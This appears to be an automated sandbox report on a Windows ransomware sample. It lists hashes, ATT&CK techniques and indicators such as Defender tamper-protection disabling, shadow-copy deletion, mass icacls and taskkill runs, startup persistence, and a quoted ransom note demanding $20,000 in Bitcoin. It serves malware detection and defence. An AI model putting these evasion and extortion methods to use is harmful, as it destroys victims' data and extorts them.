2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
151s
max time network
153s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
Size

97KB
MD5

212614aa34906a41edd51491c7980529
SHA1

671f1031d3b2cd242a270e17718cc0fe20122ad0
SHA256

d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00
SHA512

21a57568c090f0ed72b599168a16d1bfb2073e639972fb0268e6d91143f5bb54292fd6a15fea20f6d90ee817eafebf771b6c7771318a90de148fd95692f49d6a

Score

10^/10

discovery evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 2 IoCs

Processes:

mshta.exe

flow pid process

67 5996 mshta.exe
69 5996 mshta.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

k4gt3gok.exe48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

pid process

2012 k4gt3gok.exe
380 48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

flow	pid	process
67	5996	mshta.exe
69	5996	mshta.exe

pid	process
2012	k4gt3gok.exe
380	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\Pictures\EditImport.raw.crypted	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
File created	C:\Users\Admin\Pictures\ReceiveSuspend.tiff.crypted	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\ReceiveSuspend.tiff	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe

Drops startup file 1 IoCs

Processes:

d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
4208	icacls.exe
5780	icacls.exe
6988	icacls.exe
4556	icacls.exe
4768	icacls.exe
5088	icacls.exe
6080	icacls.exe
6856	icacls.exe
6344	icacls.exe
5072	icacls.exe
4128	icacls.exe
5428	icacls.exe
5452	icacls.exe
5016	icacls.exe
7008	icacls.exe
4392	icacls.exe
5448	icacls.exe
5724	icacls.exe
4136	icacls.exe
3428	icacls.exe
3140	icacls.exe
5748	icacls.exe
6688	icacls.exe
6388	icacls.exe
4016	icacls.exe
4924	icacls.exe
4780	icacls.exe
2144	icacls.exe
6572	icacls.exe
5148	icacls.exe
6924	icacls.exe
3132	icacls.exe
5748	icacls.exe
6136	icacls.exe
4940	icacls.exe
6008	icacls.exe
3276	icacls.exe
4608	icacls.exe
4572	icacls.exe
6728	icacls.exe
4792	icacls.exe
4712	icacls.exe
2424	icacls.exe
4300	icacls.exe
5496	icacls.exe
6200	icacls.exe
6596	icacls.exe
6988	icacls.exe
4992	icacls.exe
5332	icacls.exe
6096	icacls.exe
6568	icacls.exe
4188	icacls.exe
4768	icacls.exe
6168	icacls.exe
5076	icacls.exe
3940	icacls.exe
4972	icacls.exe
4508	icacls.exe
6224	icacls.exe
6900	icacls.exe
6368	icacls.exe
4428	icacls.exe
2768	icacls.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe

Drops file in System32 directory 2 IoCs

Processes:

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
6152	vssadmin.exe
4824	vssadmin.exe
6060	vssadmin.exe
6188	vssadmin.exe
6124	vssadmin.exe
5372	vssadmin.exe
4860	vssadmin.exe
6196	vssadmin.exe
6108	vssadmin.exe
6088	vssadmin.exe
6160	vssadmin.exe
5284	vssadmin.exe
6032	vssadmin.exe
6172	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4664	taskkill.exe
7132	taskkill.exe
4540	taskkill.exe
4204	taskkill.exe
6228	taskkill.exe
4212	taskkill.exe
4732	taskkill.exe
6580	taskkill.exe
2200	taskkill.exe
4188	taskkill.exe
6616	taskkill.exe
2388	taskkill.exe
4944	taskkill.exe
4120	taskkill.exe
6788	taskkill.exe
7120	taskkill.exe
5324	taskkill.exe
4160	taskkill.exe
5164	taskkill.exe
3520	taskkill.exe
6296	taskkill.exe
4816	taskkill.exe
1520	taskkill.exe
6440	taskkill.exe
6948	taskkill.exe
4468	taskkill.exe
3428	taskkill.exe
5740	taskkill.exe
6904	taskkill.exe
4268	taskkill.exe
5808	taskkill.exe
4768	taskkill.exe
5544	taskkill.exe
5432	taskkill.exe
4524	taskkill.exe
5556	taskkill.exe
6916	taskkill.exe
3396	taskkill.exe
6888	taskkill.exe
4600	taskkill.exe
5912	taskkill.exe
6644	taskkill.exe
6688	taskkill.exe
6364	taskkill.exe
2244	taskkill.exe
4640	taskkill.exe
4544	taskkill.exe
2972	taskkill.exe
3772	taskkill.exe
5468	taskkill.exe
4452	taskkill.exe
4444	taskkill.exe
5024	taskkill.exe
5948	taskkill.exe
6732	taskkill.exe
6024	taskkill.exe
2900	taskkill.exe
4328	taskkill.exe
5776	taskkill.exe
5844	taskkill.exe
6864	taskkill.exe
5320	taskkill.exe
6016	taskkill.exe
4956	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Conhost.exepowershell.exe48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exeicacls.exepowershell.exeConhost.exeicacls.exeConhost.exepowershell.exeicacls.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	Conhost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	icacls.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	icacls.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	Conhost.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

2180 reg.exe
5108 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 7 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

5064 PING.EXE
6948 PING.EXE
5448 PING.EXE
6188 PING.EXE
6768 PING.EXE
6472 PING.EXE
6740 PING.EXE

pid	process
2180	reg.exe
5108	reg.exe

pid	process
5064	PING.EXE
6948	PING.EXE
5448	PING.EXE
6188	PING.EXE
6768	PING.EXE
6472	PING.EXE
6740	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exepowershell.exe

pid	process
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
1784	powershell.exe
1784	powershell.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
1784	powershell.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exepowershell.exeConhost.exepowershell.exepowershell.exepowershell.exesc.exepowershell.exepowershell.exepowershell.exeConhost.exeConhost.exeicacls.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exek4gt3gok.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	976	d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeIncreaseQuotaPrivilege	1784	powershell.exe
Token: SeSecurityPrivilege	1784	powershell.exe
Token: SeTakeOwnershipPrivilege	1784	powershell.exe
Token: SeLoadDriverPrivilege	1784	powershell.exe
Token: SeSystemProfilePrivilege	1784	powershell.exe
Token: SeSystemtimePrivilege	1784	powershell.exe
Token: SeProfSingleProcessPrivilege	1784	powershell.exe
Token: SeIncBasePriorityPrivilege	1784	powershell.exe
Token: SeCreatePagefilePrivilege	1784	powershell.exe
Token: SeBackupPrivilege	1784	powershell.exe
Token: SeRestorePrivilege	1784	powershell.exe
Token: SeShutdownPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeSystemEnvironmentPrivilege	1784	powershell.exe
Token: SeRemoteShutdownPrivilege	1784	powershell.exe
Token: SeUndockPrivilege	1784	powershell.exe
Token: SeManageVolumePrivilege	1784	powershell.exe
Token: 33	1784	powershell.exe
Token: 34	1784	powershell.exe
Token: 35	1784	powershell.exe
Token: 36	1784	powershell.exe
Token: SeDebugPrivilege	3968	Conhost.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	736	powershell.exe
Token: SeDebugPrivilege	3136	sc.exe
Token: SeDebugPrivilege	2620	powershell.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeDebugPrivilege	4108	powershell.exe
Token: SeDebugPrivilege	4240	Conhost.exe
Token: SeDebugPrivilege	4344	Conhost.exe
Token: SeDebugPrivilege	4464	icacls.exe
Token: SeDebugPrivilege	4568	taskkill.exe
Token: SeDebugPrivilege	5948	taskkill.exe
Token: SeDebugPrivilege	4944	taskkill.exe
Token: SeDebugPrivilege	5024	taskkill.exe
Token: SeAssignPrimaryTokenPrivilege	2012	k4gt3gok.exe
Token: SeIncreaseQuotaPrivilege	2012	k4gt3gok.exe
Token: SeImpersonatePrivilege	2012	k4gt3gok.exe
Token: SeIncreaseQuotaPrivilege	3968	Conhost.exe
Token: SeSecurityPrivilege	3968	Conhost.exe
Token: SeTakeOwnershipPrivilege	3968	Conhost.exe
Token: SeLoadDriverPrivilege	3968	Conhost.exe
Token: SeSystemProfilePrivilege	3968	Conhost.exe
Token: SeSystemtimePrivilege	3968	Conhost.exe
Token: SeProfSingleProcessPrivilege	3968	Conhost.exe
Token: SeIncBasePriorityPrivilege	3968	Conhost.exe
Token: SeCreatePagefilePrivilege	3968	Conhost.exe
Token: SeBackupPrivilege	3968	Conhost.exe
Token: SeRestorePrivilege	3968	Conhost.exe
Token: SeShutdownPrivilege	3968	Conhost.exe
Token: SeDebugPrivilege	3968	Conhost.exe
Token: SeSystemEnvironmentPrivilege	3968	Conhost.exe
Token: SeRemoteShutdownPrivilege	3968	Conhost.exe
Token: SeUndockPrivilege	3968	Conhost.exe
Token: SeManageVolumePrivilege	3968	Conhost.exe
Token: 33	3968	Conhost.exe
Token: 34	3968	Conhost.exe
Token: 35	3968	Conhost.exe
Token: 36	3968	Conhost.exe
Token: SeIncreaseQuotaPrivilege	2508	taskkill.exe
Token: SeSecurityPrivilege	2508	taskkill.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe

pid	process
